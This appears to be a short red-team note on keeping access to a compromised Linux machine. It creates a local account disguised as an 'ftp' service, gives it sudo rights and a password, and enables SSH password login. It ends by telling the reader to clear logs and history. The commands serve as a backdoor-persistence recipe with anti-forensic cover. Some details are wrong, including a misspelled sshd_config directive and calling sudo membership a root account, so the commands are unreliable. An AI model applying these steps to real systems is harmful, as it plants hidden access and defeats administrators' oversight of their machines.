General
Creating a privilege local account on a system and disguising it as a service can be a way for an attacker to maintain access to a compromised machine. A local account is an account that is specific to a single machine, as opposed to an account that is valid across multiple machines on a network. By creating a local account, an attacker can log in to the machine using that account and potentially gain access to resources or perform actions that would not be possible with a standard user account.
To make the local account appear as a service, the attacker can modify the system's configuration so that the account is automatically started when the machine is booted. This can make it difficult for a system administrator or other user to notice that the account exists, as it will appear to be a legitimate service running on the machine.
If an attacker is able to create a local account and disguise it as a service, they can use it to maintain access to the machine even after a reboot or after they have logged out. This can allow the attacker to remain undetected on the system and to continue to perform actions or gather sensitive data over an extended period of time.
Commands
Take note that you need an adminitrator account to create a root user
Create user (Mimic Service)
useradd -M -s /bin/bash ftp
- -M ---> Dont create a direcotry
- -m /place ---> Create a directory in the place of your choice
- -s /bin/bash ---> Type of Shell
- ftp ---> Name of the user/service
Give the user ROOT right & Set password
usermod -aG sudo ftp ---> Add user to SUDO groups
groups ftp ---> Check Groups
passwd ftp ---> Set password
SSH Authentification setup (edit etc/ssh/sshd_config)
# Enable login via passowrd or use the Account Manipulation technique
# Uncomment
PasswordAuthentification yes
- SSH Login via password or SSH keys
===Dont Forget to Clear Tracks (Check [[🧹 CLEAR Logs & History]])===